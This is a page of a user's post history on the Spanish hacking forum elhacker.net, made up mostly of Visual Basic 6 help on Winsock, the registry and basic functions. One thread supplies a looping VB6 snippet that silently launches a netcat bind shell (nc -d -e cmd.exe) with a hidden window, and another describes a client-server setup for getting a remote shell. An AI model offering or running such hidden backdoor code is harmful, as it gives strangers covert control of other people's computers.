elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 ... 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25 26
221  Programación / Programación Visual Basic / Re: Duda empezando con winsock en: 5 Marzo 2008, 02:21 am
Citar
se supone que el winsock deberia seguir a la escucha i aceptar conexiones entrantes no? como es possible que el servidor siga ejecutandose pero no reciba ordenes del cliente :S

Porque el servidor llama al procedimiento Escuchar solo en el load del form1.
Entonces cuando se cierra la conexion, tendrias que ponerle que lo llame de vuelta. Eso seria en el evento Error y Close del winsock.
222  Programación / Programación Visual Basic / Re: Duda sobre un bucle para NetCat en: 4 Marzo 2008, 17:53 pm
Yo hice un programa que trabajaba con el netcat.
Iba asi:
Primero ponia a escuchar mi netcat, luego desde el cliente hecho en VB6 enviaba una orden al servidor para que iniciara netcat con x parametros, y me devolviera la shell. Lo podes hacer escribiendo "startnc", envias los datos y que en el servidor los interprete e inicie el netcat cada vez que recibe eso ( "startnc" ).
223  Programación / Programación Visual Basic / Re: Regsetvalue no me va en: 4 Marzo 2008, 17:46 pm
Ahi anduvo  ;D Gracias chefitooo
Estuve comiendome la cabeza un dia entero.  :-\
224  Programación / Programación Visual Basic / Re: Duda sobre un bucle para NetCat en: 4 Marzo 2008, 06:49 am
Ahi te lo dijo casiani  ;D
225  Programación / Programación Visual Basic / Re: Duda sobre un bucle para NetCat en: 4 Marzo 2008, 01:10 am
A ver. tu quieres dejar un puerto a la escucha en la maquina remota o que? No se entiende de que es el bucle!

Citar
Mi pregunta es si existe alguna forma de hacer que hasta que la conexion del netcat no haya terminado, no vuelva a ejecutarla.

Tendria que hacer uso de un condicional, como If..Then o Do while...Loop.

Código:
Do until x= 10
  x=x+1
  Msgbox x
Loop

Si especificas mejor lo del netcat te puedo pasar algun coidog hecho mas preciso.
Y a esta linea le faltaria vbHide, poque sino se ejecutaria el simbolo de sistema igualmente visible.
Código:
Código:
Private Sub Form_Load()

bucle:
    Shell "nc -d -e cmd.exe -p 25554", vbHide
    GoTo bucle
   
End Sub
226  Programación / Programación Visual Basic / Regsetvalue no me va en: 3 Marzo 2008, 22:27 pm
Tengo esto

Código:
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const ERROR_SUCCESS = 0&
Private Const REG_BINARY = 3                    
Private Const REG_DWORD = 4    
Private Const REG_SZ = 1          
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long         ' Note that if you declare the lpData parameter as String, you must pass it By Value.


Private Sub Form_Load()
If RegSetValueEx(HKEY_LOCAL_MACHINE, "hola", 0&, REG_SZ, "Esto es una prueba", Len("Esto es una prueba") + 1 ) = ERROR_SUCCESS Then
MsgBox "soy un genio"
Else
MsgBox "ups"
End If
Unload Me
End Sub

Pero el valor del registro en vez de contener "Esto es uan prueba", me aparece con simbolos raros (como si hubiese ocurrido algun error: d±).
Probe cambiando el string en Len(x) por una variable pero tampoco. Y probe sacandole el mas 1 y tampoco.
Tampoco me sale con binario ni con numeros. Que estoy haciendo mal?  :(
227  Programación / Programación Visual Basic / Re: Como Usar los Combos? en: 3 Marzo 2008, 21:27 pm
Yo pondria un control data con la columna paises, y que al irse deslizando por los paises del data me muestre en un listbox las ciudades de ese pais. Si necesitas mas ayuda, te paso algun code
228  Programación / Programación Visual Basic / Re: como puedo borrar Archivos del registro? en: 1 Marzo 2008, 06:46 am
Citar
registro RegEdit con VB

jeje la aplicacion que te permite ver y editar el registro es RegEdit, pero el registro no se llama regedit  :P
229  Programación / Programación Visual Basic / Re: para que sirve el Len y para que lo utilizo? en: 1 Marzo 2008, 06:44 am
Claro. Es lo que dijeron los señores.
Con un poco de imaginacion puede tener una gran utilidad, tanto en casos basicos como avanzados.
Código:
If Len(string) > 4 then bla bla bla

Select Case X
   if Len(x)=2 Then bla bla
230  Programación / Programación Visual Basic / Re: [source]transformer en: 28 Febrero 2008, 23:30 pm
Citar
Porfavor escribe en castellano que no te entiendo nada de lo que escribes.. O.o
Totalmente de acuerdo.

Por cierto, muy lindo el programa. ;D
Páginas: 1 ... 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25 26
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines